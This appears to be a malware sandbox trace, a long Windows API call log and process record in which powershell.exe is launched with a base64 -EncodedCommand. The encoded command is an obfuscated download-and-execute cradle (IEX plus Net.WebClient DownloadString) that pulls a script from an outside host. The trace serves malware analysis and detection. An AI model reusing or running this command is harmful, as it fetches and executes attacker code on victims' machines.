	[0428.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.731] SetErrorMode (uMode=0x1) returned 0x1
	[0428.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.731] SetErrorMode (uMode=0x1) returned 0x1
	[0428.731] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.732] SetErrorMode (uMode=0x1) returned 0x1
	[0428.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.732] SetErrorMode (uMode=0x1) returned 0x1
	[0428.732] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.732] SetErrorMode (uMode=0x1) returned 0x1
	[0428.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.732] SetErrorMode (uMode=0x1) returned 0x1
	[0428.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.733] SetErrorMode (uMode=0x1) returned 0x1
	[0428.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.733] SetErrorMode (uMode=0x1) returned 0x1
	[0428.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.733] SetErrorMode (uMode=0x1) returned 0x1
	[0428.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.734] SetErrorMode (uMode=0x1) returned 0x1
	[0428.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.734] SetErrorMode (uMode=0x1) returned 0x1
	[0428.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.734] SetErrorMode (uMode=0x1) returned 0x1
	[0428.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.735] SetErrorMode (uMode=0x1) returned 0x1
	[0428.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.735] SetErrorMode (uMode=0x1) returned 0x1
	[0428.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.735] SetErrorMode (uMode=0x1) returned 0x1
	[0428.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.735] SetErrorMode (uMode=0x1) returned 0x1
	[0428.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.736] SetErrorMode (uMode=0x1) returned 0x1
	[0428.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.736] SetErrorMode (uMode=0x1) returned 0x1
	[0428.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.736] SetErrorMode (uMode=0x1) returned 0x1
	[0428.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.737] SetErrorMode (uMode=0x1) returned 0x1
	[0428.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.737] SetErrorMode (uMode=0x1) returned 0x1
	[0428.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0428.737] SetErrorMode (uMode=0x1) returned 0x1
	[0428.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.737] SetErrorMode (uMode=0x1) returned 0x1
	[0429.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0429.009] SetErrorMode (uMode=0x1) returned 0x1
	[0429.009] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0429.009] SetErrorMode (uMode=0x1) returned 0x1
	[0429.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0429.010] SetErrorMode (uMode=0x1) returned 0x1
	[0429.010] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x361a30
	[0429.011] FindNextFileW (in: hFindFile=0x361a30, lpFindFileData=0x1c83de50 | out: lpFindFileData=0x1c83de50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0429.011] FindClose (in: hFindFile=0x361a30 | out: hFindFile=0x361a30) returned 1
	[0429.011] SetErrorMode (uMode=0x1) returned 0x1
	[0429.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c83df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0429.022] SetErrorMode (uMode=0x1) returned 0x1
	[0429.022] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c83e170 | out: lpFileInformation=0x1c83e170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0429.022] SetErrorMode (uMode=0x1) returned 0x1
	[0429.023] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.023] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.025] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.025] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.028] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.028] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.039] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.039] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.209] CoTaskMemAlloc (cb=0x3b) returned 0x35eba0
	[0429.210] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c83e358, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83e358) returned 0x4550
	[0429.210] CoTaskMemFree (pv=0x35eba0) 
	[0429.214] GetConsoleWindow () returned 0x102cc
	[0429.221] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.221] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.222] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0429.222] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.228] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad620
	[0429.228] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b8ad620, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0429.228] CoTaskMemFree (pv=0x1b8ad620) 
	[0429.230] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c83e3a0 | out: pNumArgs=0x1c83e3a0) returned 0x1b8b0d30*=""
	[0429.232] lstrlenW (lpString="-EncodedCommand") returned 15
	[0429.233] CoTaskMemAlloc (cb=0x22) returned 0x1b8ceea0
	[0429.233] RtlMoveMemory (in: Destination=0x1b8ceea0, Source=0x1b8b0d52, Length=0x20 | out: Destination=0x1b8ceea0) 
	[0429.233] CoTaskMemFree (pv=0x1b8ceea0) 
	[0429.233] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0429.233] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8a3d30
	[0429.233] RtlMoveMemory (in: Destination=0x1b8a3d30, Source=0x1b8b0d72, Length=0x2f2 | out: Destination=0x1b8a3d30) 
	[0429.233] CoTaskMemFree (pv=0x1b8a3d30) 
	[0429.234] LocalFree (hMem=0x1b8b0d30) returned 0x0
	[0429.235] CoTaskMemAlloc (cb=0x804) returned 0x1b8d5890
	[0429.235] GetConsoleTitleW (in: lpConsoleTitle=0x1b8d5890, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0429.235] CoTaskMemFree (pv=0x1b8d5890) 
	[0429.244] CoTaskMemAlloc (cb=0x38e) returned 0x1b8b0d30
	[0429.244] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c83e300*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ec6d20 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2ec6d20*(hProcess=0x3a0, hThread=0x354, dwProcessId=0x1514, dwThreadId=0x1518)) returned 1
	[0429.417] CoTaskMemFree (pv=0x1b8b0d30) 
	[0429.418] CloseHandle (hObject=0x354) returned 1
	[0429.418] CoTaskMemAlloc (cb=0x3b) returned 0x35eba0
	[0429.418] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c83e3a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83e3a8) returned 0x4550
	[0429.419] CoTaskMemFree (pv=0x35eba0) 
	[0429.422] GetCurrentProcess () returned 0xffffffffffffffff
	[0429.422] GetCurrentProcess () returned 0xffffffffffffffff
	[0429.422] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c83e488, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c83e488*=0x354) returned 1

Process:
	id = "33"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x27fe6000"
	os_pid = "0x324"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 180
	os_tid = 0x33c

	[0370.906] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0371.985] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0371.985] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0371.985] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0371.985] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0375.017] GetVersionExW (in: lpVersionInformation=0x26dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0375.019] GetVersionExW (in: lpVersionInformation=0x26dc40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dc40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0375.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.529] GetVersionExW (in: lpVersionInformation=0x26d9b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d9b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0375.530] SetErrorMode (uMode=0x1) returned 0x1
